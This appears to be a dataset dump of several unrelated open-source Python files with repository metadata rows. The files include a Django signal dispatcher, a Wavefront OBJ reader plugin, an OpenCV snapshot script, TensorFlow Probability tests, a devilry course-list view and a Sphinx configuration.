self._log_in_user(TEST_ADMIN_EMAIL, TEST_ADMIN_PASSWORD)
response = self.client.get(reverse('admin:easyaudit_requestevent_changelist'))
self.assertEqual(200, response.status_code)
filters = self._list_filters(response.content)
print(filters)
| 39.662921 | 127 | 0.69051 |
6ecd936c99217102142dce8b9883e9ea20b6ffad | 3,338 | py | Python | src/pypevue/examples/objReader1.py | ghjwp7/pypevue | 4d2aa82f990242373207c56aa2607a2c20ecb185 | [
"MIT"
] | null | null | null | src/pypevue/examples/objReader1.py | ghjwp7/pypevue | 4d2aa82f990242373207c56aa2607a2c20ecb185 | [
"MIT"
] | null | null | null | src/pypevue/examples/objReader1.py | ghjwp7/pypevue | 4d2aa82f990242373207c56aa2607a2c20ecb185 | [
"MIT"
] | null | null | null | # -*- mode: python -*-
# objReader.py, a plugin to read point and face data from a Wavefront
# OBJ file # (a 3D-structures file format) - jiw 9 Oct 2020
# Ref: <https://www.fileformat.info/format/wavefrontobj/egff.htm>
# Usage: To incorporate this code into pypevue, in command line
# parameters or in an `=P` line of a script, say
# `Plugins=examples.objReader`. To tell it which .obj file to read,
# say `userPar2="f"` (replacing f with appropriate .obj file name).
# If no .obj file name is specified, name will default to box.obj.
# Limitation: This code handles v and f lines (specifying vertex and
# face data) that appear in .obj files (see Ref) and ignores others.
# Method: This replaces the `hookBack()` method (a `pass`) with code
# that reads data from a specified .obj file. It keeps vertex and
# face data locally (rather than adding it into pypevu's post or
# cylinder data structures). Then, for each face that was read in, it
# writes code for one 3D polyhedron. See following example.
# polyhedron(points=[[241.037, -77.8, -84.111], [240.731, -97.498,
# -80.509], [229.245, -87.185, -88.24]], faces=[[0, 1, 2]] ); . For
# this example, `f 3 4 2` appeared in an OBJ file. The coordinates of
# OBJ-file vertices 3, 4, and 2 are listed in the points[] array, in
# that order, so that the faces[] array can refer to them as points 0,
# 1, and 2.
from math import sqrt, pi, cos, sin, asin, atan2, degrees
from pypevue import ssq, sssq, rotate2, isTrue, Point
from pypevue import FunctionList as ref
from re import sub
#---------------------------------------------------------
def hookBack(fout):
# Is a file name given?
fn = ref.userPar2 if ref.userPar2 else 'box.obj'
fn = sub('^"|"$', '', fn) # Strip outer quotes if any
verts = []
faces = []
with open(fn) as fin:
lin = 0; skipped = []; nskipped = 0
while (token := fin.readline()):
lin += 1
if token.startswith('v '): # vertex command
x,y,z = [float(u) for u in token[2:].split()]
verts.append(Point(x, y, z))
elif token.startswith('f '): # face command
f = []
token = sub('/[/0-9]*', '', token)
for u in token[2:].split():
f.append(int(u)-1) # Make list of corners of face
faces.append(f)
elif token.startswith('#') or token=='' or token=='\n':
pass # ignore comments and empty lines
else:
#print (f"Skipping line {lin} of OBJ file: {token}")
nskipped += 1
if len(skipped) < 34:
skipped.append(lin)
print (f"Skipped {nskipped} lines (#{' '.join(str(i) for i in skipped)}...) of the {lin} lines in OBJ file")
nverts = len(verts)
# Scale the vertices
for i in range(nverts):
verts[i].scale(ref.SF)
# Write OpenSCAD code for faces
for f in faces:
pl = ', '.join(f'[{verts[i]}]' for i in f)
fout.write(f'polyhedron(points=[{pl}], ')
pl = ', '.join(str(i) for i in range(len(f)))
fout.write(f'faces=[[{pl}]] );\n')
#---------------------------------------------------------
def tell(): return (hookBack,)
#---------------------------------------------------------
| 43.350649 | 112 | 0.560216 |
2dc97bd65ca13d5602d89ca2614ac84eb9acf05b | 1,612 | py | Python | mono/save_snapshots.py | EmbeddedPaul166/Camera-Calibration | b68366971b7df715f6a38ac804310ca3754b663e | [
"MIT"
] | null | null | null | mono/save_snapshots.py | EmbeddedPaul166/Camera-Calibration | b68366971b7df715f6a38ac804310ca3754b663e | [
"MIT"
] | null | null | null | mono/save_snapshots.py | EmbeddedPaul166/Camera-Calibration | b68366971b7df715f6a38ac804310ca3754b663e | [
"MIT"
] | null | null | null | import cv2
import time
import sys
import os
def prepare_window():
window_name = "Save snapshots"
cv2.namedWindow(window_name, cv2.WINDOW_NORMAL)
cv2.resizeWindow(window_name, 1280, 720)
cv2.moveWindow(window_name, 0, 0)
cv2.setWindowTitle(window_name, "Save snapshots")
return window_name
def save_snapshots():
name = "snapshot"
folder = "images/mono/"
video_capture = cv2.VideoCapture("v4l2src device=/dev/video3 ! video/x-raw,format=UYVY,width=1920,height=1080,framerate=30/1 ! nvvidconv ! video/x-raw(memory:NVMM), format=I420 ! nvvidconv ! video/x-raw, format=(string)BGRx ! videoconvert ! video/x-raw,format=(string)BGR ! appsink", cv2.CAP_GSTREAMER)
window_name = prepare_window()
try:
if not os.path.exists(folder):
os.makedirs(folder)
folder = os.path.dirname(folder)
try:
os.stat(folder)
except:
os.mkdir(folder)
except:
pass
image_count = 1
w = 1920
h = 1080
file_name = "%s/%s" %(folder, name)
while True:
ret, frame = video_capture.read()
cv2.imshow(window_name, frame)
key = cv2.waitKey(10)
if key == ord('q'):
break
if key == ord(' '):
print("Saving image ", image_count)
cv2.imwrite("%s%d.jpg"%(file_name, image_count), frame)
image_count += 1
video_capture.release()
cv2.destroyAllWindows()
def main():
save_snapshots()
print("Files saved")
if __name__ == "__main__":
main()
| 25.1875 | 306 | 0.597395 |
4983f8f4278b37e9a14f021c48e3db015f42da33 | 11,712 | py | Python | django/dispatch/dispatcher.py | mitchelljkotler/django | bdd2d7ff92624f5cf4fc6d212ba82b5d309ee48a | [
"BSD-3-Clause"
] | 3 | 2015-09-26T13:33:07.000Z | 2020-03-08T07:34:38.000Z | django/dispatch/dispatcher.py | mitchelljkotler/django | bdd2d7ff92624f5cf4fc6d212ba82b5d309ee48a | [
"BSD-3-Clause"
] | null | null | null | django/dispatch/dispatcher.py | mitchelljkotler/django | bdd2d7ff92624f5cf4fc6d212ba82b5d309ee48a | [
"BSD-3-Clause"
] | 15 | 2016-01-08T14:28:41.000Z | 2019-04-19T08:33:31.000Z | import sys
import threading
import warnings
import weakref
from django.utils import six
from django.utils.deprecation import RemovedInDjango20Warning
from django.utils.inspect import func_accepts_kwargs
from django.utils.six.moves import range
if six.PY2:
from .weakref_backports import WeakMethod
else:
from weakref import WeakMethod
def _make_id(target):
if hasattr(target, '__func__'):
return (id(target.__self__), id(target.__func__))
return id(target)
NONE_ID = _make_id(None)
# A marker for caching
NO_RECEIVERS = object()
class Signal(object):
"""
Base class for all signals
Internal attributes:
receivers
{ receiverkey (id) : weakref(receiver) }
"""
def __init__(self, providing_args=None, use_caching=False):
"""
Create a new signal.
providing_args
A list of the arguments this signal can pass along in a send() call.
"""
self.receivers = []
if providing_args is None:
providing_args = []
self.providing_args = set(providing_args)
self.lock = threading.Lock()
self.use_caching = use_caching
# For convenience we create empty caches even if they are not used.
# A note about caching: if use_caching is defined, then for each
# distinct sender we cache the receivers that sender has in
# 'sender_receivers_cache'. The cache is cleaned when .connect() or
# .disconnect() is called and populated on send().
self.sender_receivers_cache = weakref.WeakKeyDictionary() if use_caching else {}
self._dead_receivers = False
def connect(self, receiver, sender=None, weak=True, dispatch_uid=None):
"""
Connect receiver to sender for signal.
Arguments:
receiver
A function or an instance method which is to receive signals.
Receivers must be hashable objects.
If weak is True, then receiver must be weak referenceable.
Receivers must be able to accept keyword arguments.
If a receiver is connected with a dispatch_uid argument, it
will not be added if another receiver was already connected
with that dispatch_uid.
sender
The sender to which the receiver should respond. Must either be
of type Signal, or None to receive events from any sender.
weak
Whether to use weak references to the receiver. By default, the
module will attempt to use weak references to the receiver
objects. If this parameter is false, then strong references will
be used.
dispatch_uid
An identifier used to uniquely identify a particular instance of
a receiver. This will usually be a string, though it may be
anything hashable.
"""
from django.conf import settings
# If DEBUG is on, check that we got a good receiver
if settings.configured and settings.DEBUG:
assert callable(receiver), "Signal receivers must be callable."
# Check for **kwargs
if not func_accepts_kwargs(receiver):
raise ValueError("Signal receivers must accept keyword arguments (**kwargs).")
if dispatch_uid:
lookup_key = (dispatch_uid, _make_id(sender))
else:
lookup_key = (_make_id(receiver), _make_id(sender))
if weak:
ref = weakref.ref
receiver_object = receiver
# Check for bound methods
if hasattr(receiver, '__self__') and hasattr(receiver, '__func__'):
ref = WeakMethod
receiver_object = receiver.__self__
if six.PY3:
receiver = ref(receiver)
weakref.finalize(receiver_object, self._remove_receiver)
else:
receiver = ref(receiver, self._remove_receiver)
with self.lock:
self._clear_dead_receivers()
for r_key, _ in self.receivers:
if r_key == lookup_key:
break
else:
self.receivers.append((lookup_key, receiver))
self.sender_receivers_cache.clear()
def disconnect(self, receiver=None, sender=None, weak=None, dispatch_uid=None):
"""
Disconnect receiver from sender for signal.
If weak references are used, disconnect need not be called. The receiver
will be remove from dispatch automatically.
Arguments:
receiver
The registered receiver to disconnect. May be none if
dispatch_uid is specified.
sender
The registered sender to disconnect
dispatch_uid
the unique identifier of the receiver to disconnect
"""
if weak is not None:
warnings.warn("Passing `weak` to disconnect has no effect.",
RemovedInDjango20Warning, stacklevel=2)
if dispatch_uid:
lookup_key = (dispatch_uid, _make_id(sender))
else:
lookup_key = (_make_id(receiver), _make_id(sender))
disconnected = False
with self.lock:
self._clear_dead_receivers()
for index in range(len(self.receivers)):
(r_key, _) = self.receivers[index]
if r_key == lookup_key:
disconnected = True
del self.receivers[index]
break
self.sender_receivers_cache.clear()
return disconnected
def has_listeners(self, sender=None):
return bool(self._live_receivers(sender))
def send(self, sender, **named):
"""
Send signal from sender to all connected receivers.
If any receiver raises an error, the error propagates back through send,
terminating the dispatch loop, so it is quite possible to not have all
receivers called if a raises an error.
Arguments:
sender
The sender of the signal Either a specific object or None.
named
Named arguments which will be passed to receivers.
Returns a list of tuple pairs [(receiver, response), ... ].
"""
responses = []
if not self.receivers or self.sender_receivers_cache.get(sender) is NO_RECEIVERS:
return responses
for receiver in self._live_receivers(sender):
response = receiver(signal=self, sender=sender, **named)
responses.append((receiver, response))
return responses
def send_robust(self, sender, **named):
"""
Send signal from sender to all connected receivers catching errors.
Arguments:
sender
The sender of the signal. Can be any python object (normally one
registered with a connect if you actually want something to
occur).
named
Named arguments which will be passed to receivers. These
arguments must be a subset of the argument names defined in
providing_args.
Return a list of tuple pairs [(receiver, response), ... ]. May raise
DispatcherKeyError.
If any receiver raises an error (specifically any subclass of
Exception), the error instance is returned as the result for that
receiver. The traceback is always attached to the error at
``__traceback__``.
"""
responses = []
if not self.receivers or self.sender_receivers_cache.get(sender) is NO_RECEIVERS:
return responses
# Call each receiver with whatever arguments it can accept.
# Return a list of tuple pairs [(receiver, response), ... ].
for receiver in self._live_receivers(sender):
try:
response = receiver(signal=self, sender=sender, **named)
except Exception as err:
if not hasattr(err, '__traceback__'):
err.__traceback__ = sys.exc_info()[2]
responses.append((receiver, err))
else:
responses.append((receiver, response))
return responses
def _clear_dead_receivers(self):
# Note: caller is assumed to hold self.lock.
if self._dead_receivers:
self._dead_receivers = False
new_receivers = []
for r in self.receivers:
if isinstance(r[1], weakref.ReferenceType) and r[1]() is None:
continue
new_receivers.append(r)
self.receivers = new_receivers
def _live_receivers(self, sender):
"""
Filter sequence of receivers to get resolved, live receivers.
This checks for weak references and resolves them, then returning only
live receivers.
"""
receivers = None
if self.use_caching and not self._dead_receivers:
receivers = self.sender_receivers_cache.get(sender)
# We could end up here with NO_RECEIVERS even if we do check this case in
# .send() prior to calling _live_receivers() due to concurrent .send() call.
if receivers is NO_RECEIVERS:
return []
if receivers is None:
with self.lock:
self._clear_dead_receivers()
senderkey = _make_id(sender)
receivers = []
for (receiverkey, r_senderkey), receiver in self.receivers:
if r_senderkey == NONE_ID or r_senderkey == senderkey:
receivers.append(receiver)
if self.use_caching:
if not receivers:
self.sender_receivers_cache[sender] = NO_RECEIVERS
else:
# Note, we must cache the weakref versions.
self.sender_receivers_cache[sender] = receivers
non_weak_receivers = []
for receiver in receivers:
if isinstance(receiver, weakref.ReferenceType):
# Dereference the weak reference.
receiver = receiver()
if receiver is not None:
non_weak_receivers.append(receiver)
else:
non_weak_receivers.append(receiver)
return non_weak_receivers
def _remove_receiver(self, receiver=None):
# Mark that the self.receivers list has dead weakrefs. If so, we will
# clean those up in connect, disconnect and _live_receivers while
# holding self.lock. Note that doing the cleanup here isn't a good
# idea, _remove_receiver() will be called as side effect of garbage
# collection, and so the call can happen while we are already holding
# self.lock.
self._dead_receivers = True
def receiver(signal, **kwargs):
"""
A decorator for connecting receivers to signals. Used by passing in the
signal (or list of signals) and keyword arguments to connect::
@receiver(post_save, sender=MyModel)
def signal_receiver(sender, **kwargs):
...
@receiver([post_save, post_delete], sender=MyModel)
def signals_receiver(sender, **kwargs):
...
"""
def _decorator(func):
if isinstance(signal, (list, tuple)):
for s in signal:
s.connect(func, **kwargs)
else:
signal.connect(func, **kwargs)
return func
return _decorator
| 36.714734 | 94 | 0.600239 |
a14feec9138e055cffa7aefb1365a269a7897a50 | 715 | py | Python | _background/Johann Rocholl's Source/Final/prototype/rename.py | Farranco/HyperopicBarcode | e1389f496f1d21e4ffcf216982a09a15fa998db7 | [
"Intel",
"Unlicense"
] | 1 | 2016-08-31T04:57:05.000Z | 2016-08-31T04:57:05.000Z | _background/Johann Rocholl's Source/Initial/prototype/rename.py | Farranco/HyperopicBarcode | e1389f496f1d21e4ffcf216982a09a15fa998db7 | [
"Intel",
"Unlicense"
] | null | null | null | _background/Johann Rocholl's Source/Initial/prototype/rename.py | Farranco/HyperopicBarcode | e1389f496f1d21e4ffcf216982a09a15fa998db7 | [
"Intel",
"Unlicense"
] | null | null | null | #!/usr/bin/env python
import sys
import re
import os
UPC_REGEX = re.compile(r'(\d\d\d\d\d\d)-(\d\d\d\d\d\d)[-_\.](.*)')
EAN_REGEX = re.compile(r'(\d)(\d\d\d\d\d\d)(\d\d\d\d\d\d)[-_\.](.*)')
def rename(filename, parts):
newname = '-'.join(parts)
print filename, '=>', newname
os.rename(filename, newname)
for filename in sys.argv:
match = UPC_REGEX.match(filename)
if match:
parts = list(match.groups())
parts[0] = parts[0].replace('-', '')
parts[1] = parts[1].replace('-', '')
parts.insert(0, '0')
rename(filename, parts)
continue
match = EAN_REGEX.match(filename)
if match:
rename(filename, match.groups())
continue
| 23.833333 | 69 | 0.566434 |
8fca046d320282c5d3c69c7ecb010c01849f552e | 4,595 | py | Python | tensorflow_probability/python/sts/local_linear_trend_test.py | nbro/probability | 07a6378155f0ed720b5aaccf5387e3f9a432bd10 | [
"Apache-2.0"
] | null | null | null | tensorflow_probability/python/sts/local_linear_trend_test.py | nbro/probability | 07a6378155f0ed720b5aaccf5387e3f9a432bd10 | [
"Apache-2.0"
] | null | null | null | tensorflow_probability/python/sts/local_linear_trend_test.py | nbro/probability | 07a6378155f0ed720b5aaccf5387e3f9a432bd10 | [
"Apache-2.0"
] | null | null | null | # Copyright 2018 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Local Linear Trend State Space Model Tests."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Dependency imports
import numpy as np
import tensorflow.compat.v1 as tf1
import tensorflow.compat.v2 as tf
from tensorflow_probability.python import distributions as tfd
from tensorflow_probability.python.internal import test_util
from tensorflow_probability.python.sts import LocalLinearTrendStateSpaceModel
tfl = tf.linalg
class _LocalLinearTrendStateSpaceModelTest(object):
def test_logprob(self):
y = self._build_placeholder([1.0, 2.5, 4.3, 6.1, 7.8])
ssm = LocalLinearTrendStateSpaceModel(
num_timesteps=5,
level_scale=0.5,
slope_scale=0.5,
initial_state_prior=tfd.MultivariateNormalDiag(
scale_diag=self._build_placeholder([1., 1.])))
lp = ssm.log_prob(y[..., np.newaxis])
expected_lp = -5.801624298095703
self.assertAllClose(self.evaluate(lp), expected_lp)
def test_stats(self):
# Build a model with expected initial loc 0 and slope 1.
level_scale = self._build_placeholder(1.0)
slope_scale = self._build_placeholder(1.0)
initial_state_prior = tfd.MultivariateNormalDiag(
loc=self._build_placeholder([0, 1.]),
scale_diag=self._build_placeholder([1., 1.]))
ssm = LocalLinearTrendStateSpaceModel(
num_timesteps=10,
level_scale=level_scale,
slope_scale=slope_scale,
initial_state_prior=initial_state_prior)
# In expectation, the process grows linearly.
mean = self.evaluate(ssm.mean())
self.assertAllClose(mean, np.arange(0, 10)[:, np.newaxis])
# slope variance at time T is linear: T * slope_scale
expected_variance = [1, 3, 8, 18, 35, 61, 98, 148, 213, 295]
variance = self.evaluate(ssm.variance())
self.assertAllClose(variance, np.array(expected_variance)[:, np.newaxis])
def test_batch_shape(self):
batch_shape = [4, 2]
partial_batch_shape = [2]
level_scale = self._build_placeholder(
np.exp(np.random.randn(*partial_batch_shape)))
slope_scale = self._build_placeholder(np.exp(np.random.randn(*batch_shape)))
initial_state_prior = tfd.MultivariateNormalDiag(
scale_diag=self._build_placeholder([1., 1.]))
ssm = LocalLinearTrendStateSpaceModel(
num_timesteps=10,
level_scale=level_scale,
slope_scale=slope_scale,
initial_state_prior=initial_state_prior)
self.assertAllEqual(self.evaluate(ssm.batch_shape_tensor()), batch_shape)
y = ssm.sample()
self.assertAllEqual(self.evaluate(tf.shape(input=y))[:-2], batch_shape)
def _build_placeholder(self, ndarray):
"""Convert a numpy array to a TF placeholder.
Args:
ndarray: any object convertible to a numpy array via `np.asarray()`.
Returns:
placeholder: a TensorFlow `placeholder` with default value given by the
provided `ndarray`, dtype given by `self.dtype`, and shape specified
statically only if `self.use_static_shape` is `True`.
"""
ndarray = np.asarray(ndarray).astype(self.dtype)
return tf1.placeholder_with_default(
input=ndarray, shape=ndarray.shape if self.use_static_shape else None)
@test_util.test_all_tf_execution_regimes
class LocalLinearTrendStateSpaceModelTestStaticShape32(
test_util.TestCase, _LocalLinearTrendStateSpaceModelTest):
dtype = np.float32
use_static_shape = True
@test_util.test_all_tf_execution_regimes
class LocalLinearTrendStateSpaceModelTestDynamicShape32(
test_util.TestCase, _LocalLinearTrendStateSpaceModelTest):
dtype = np.float32
use_static_shape = False
@test_util.test_all_tf_execution_regimes
class LocalLinearTrendStateSpaceModelTestStaticShape64(
test_util.TestCase, _LocalLinearTrendStateSpaceModelTest):
dtype = np.float64
use_static_shape = True
if __name__ == "__main__":
tf.test.main()
| 34.037037 | 80 | 0.730141 |
38475ef893a1c44e06196ce0a6f90d88bf15a314 | 2,687 | py | Python | devilry/devilry_student/views/dashboard/allperiods.py | devilry/devilry-django | 9ae28e462dfa4cfee966ebacbca04ade9627e715 | [
"BSD-3-Clause"
] | 29 | 2015-01-18T22:56:23.000Z | 2020-11-10T21:28:27.000Z | devilry/devilry_student/views/dashboard/allperiods.py | devilry/devilry-django | 9ae28e462dfa4cfee966ebacbca04ade9627e715 | [
"BSD-3-Clause"
] | 786 | 2015-01-06T16:10:18.000Z | 2022-03-16T11:10:50.000Z | devilry/devilry_student/views/dashboard/allperiods.py | devilry/devilry-django | 9ae28e462dfa4cfee966ebacbca04ade9627e715 | [
"BSD-3-Clause"
] | 15 | 2015-04-06T06:18:43.000Z | 2021-02-24T12:28:30.000Z |
from django.utils.translation import pgettext_lazy, gettext_lazy
from cradmin_legacy import crapp
from cradmin_legacy.crinstance import reverse_cradmin_url
from cradmin_legacy.viewhelpers import listbuilderview
from cradmin_legacy.viewhelpers import listfilter
from devilry.apps.core import models as coremodels
from devilry.devilry_cradmin import devilry_listbuilder
class PeriodItemFrame(devilry_listbuilder.common.GoForwardLinkItemFrame):
valuealias = 'period'
def get_url(self):
return reverse_cradmin_url(
instanceid='devilry_student_period',
appname='overview',
roleid=self.period.id,
viewname=crapp.INDEXVIEW_NAME,
)
def get_extra_css_classes_list(self):
return ['devilry-student-listbuilder-period-itemframe']
class AllPeriodsView(listbuilderview.FilterListMixin, listbuilderview.View):
model = coremodels.Period
paginate_by = 30
template_name = 'devilry_student/cradmin_student/allperiods/allperiods.django.html'
value_renderer_class = devilry_listbuilder.period.StudentItemValue
frame_renderer_class = PeriodItemFrame
def get_pagetitle(self):
return pgettext_lazy('student allperiods', 'Your courses')
def get_filterlist_url(self, filters_string):
return self.request.cradmin_app.reverse_appurl(
crapp.INDEXVIEW_NAME,
kwargs={'filters_string': filters_string})
def add_filterlist_items(self, filterlist):
filterlist.append(listfilter.django.single.textinput.Search(
slug='search',
label=gettext_lazy('Search'),
label_is_screenreader_only=True,
modelfields=[
'long_name',
'short_name',
'parentnode__long_name',
'parentnode__short_name',
]))
def get_unfiltered_queryset_for_role(self, role):
return coremodels.Period.objects\
.filter_user_is_relatedstudent(user=self.request.user)\
.filter_has_started()\
.extra_annotate_with_assignmentcount_for_studentuser(user=self.request.user)\
.extra_annotate_with_user_qualifies_for_final_exam(user=self.request.user)\
.select_related('parentnode')\
.order_by('-start_time', 'parentnode__long_name')
def get_no_items_message(self):
return pgettext_lazy('student allperiods',
'You are not registered on any courses in Devilry.')
class App(crapp.App):
appurls = [
crapp.Url(r'^(?P<filters_string>.+)?$',
AllPeriodsView.as_view(),
name=crapp.INDEXVIEW_NAME),
]
| 35.826667 | 89 | 0.689245 |
eb8c662e82658c768f631a21d932d76c8b874fa7 | 7,764 | py | Python | docs/conf.py | brodykenrick/MAX72xx_SPI_Arduino | 49442c6308b0ecc74cd48b94af36426eeeb385ac | [
"MIT"
] | null | null | null | docs/conf.py | brodykenrick/MAX72xx_SPI_Arduino | 49442c6308b0ecc74cd48b94af36426eeeb385ac | [
"MIT"
] | null | null | null | docs/conf.py | brodykenrick/MAX72xx_SPI_Arduino | 49442c6308b0ecc74cd48b94af36426eeeb385ac | [
"MIT"
] | 1 | 2021-02-18T14:37:15.000Z | 2021-02-18T14:37:15.000Z | # -*- coding: utf-8 -*-
#
# LedControl documentation build configuration file, created by
# sphinx-quickstart on Mon Feb 4 12:31:17 2013.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'LedControl'
copyright = u'2013, Eberhard Fahle'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1.0.0'
# The full version, including alpha/beta/rc tags.
release = '1.0.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'LedControldoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'LedControl.tex', u'LedControl Documentation',
u'Eberhard Fahle', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'ledcontrol', u'LedControl Documentation',
[u'Eberhard Fahle'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'LedControl', u'LedControl Documentation',
u'Eberhard Fahle', 'LedControl', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
| 31.950617 | 80 | 0.714967 |
d69d64a19d679d5ee6d520c60cc8c0e2c45e92ff | 81 | py | Python | scope/nest1.py | shirai708/qiita | 545393820b5d6ab3b2bfccd7b38fa13f8782ed00 | [
"CC-BY-4.0"
] | 1 | 2020-03-24T06:06:18.000Z | 2020-03-24T06:06:18.000Z | scope/nest1.py | shirai708/qiita | 545393820b5d6ab3b2bfccd7b38fa13f8782ed00 | [
"CC-BY-4.0"
] | 1 | 2020-09-12T01:44:18.000Z | 2020-09-12T07:15:55.000Z | scope/nest1.py | kaityo256/qiita | 69c3cd50a01234a6f426189b07ec335a720a8b94 | [
"CC-BY-4.0"
] | 2 | 2019-11-18T05:46:46.000Z | 2020-04-27T09:56:24.000Z | def func1():
a = 10
def func2():
print(a)
func2()
func1()
| 8.1 | 16 | 0.432099 |
57d0ba451810538dd0bf7eabb0b2531cc575d398 | 191 | py | Python | tests/basics/dict_setdefault.py | learnforpractice/micropython-cpp | 004bc8382f74899e7b876cc29bfa6a9cc976ba10 | [
"MIT"
] | 13,648 | 2015-01-01T01:34:51.000Z | 2022-03-31T16:19:53.000Z | tests/basics/dict_setdefault.py | learnforpractice/micropython-cpp | 004bc8382f74899e7b876cc29bfa6a9cc976ba10 | [
"MIT"
] | 7,092 | 2015-01-01T07:59:11.000Z | 2022-03-31T23:52:18.000Z | tests/basics/dict_setdefault.py | learnforpractice/micropython-cpp | 004bc8382f74899e7b876cc29bfa6a9cc976ba10 | [
"MIT"
] | 4,942 | 2015-01-02T11:48:50.000Z | 2022-03-31T19:57:10.000Z | d = {}
print(d.setdefault(1))
print(d.setdefault(1))
print(d.setdefault(5, 42))
print(d.setdefault(5, 1))
print(d[1])
print(d[5])
d.pop(5)
print(d.setdefault(5, 1))
print(d[1])
print(d[5])
| 13.642857 | 26 | 0.643979 |
287177a637adfa9e7de4fb9e40eb93718e19f114 | 33 | py | Python | python/testData/refactoring/pullup/fieldMove/SuperClass.py | jnthn/intellij-community | 8fa7c8a3ace62400c838e0d5926a7be106aa8557 | [
"Apache-2.0"
] | 2 | 2019-04-28T07:48:50.000Z | 2020-12-11T14:18:08.000Z | python/testData/refactoring/pullup/fieldMove/SuperClass.py | Cyril-lamirand/intellij-community | 60ab6c61b82fc761dd68363eca7d9d69663cfa39 | [
"Apache-2.0"
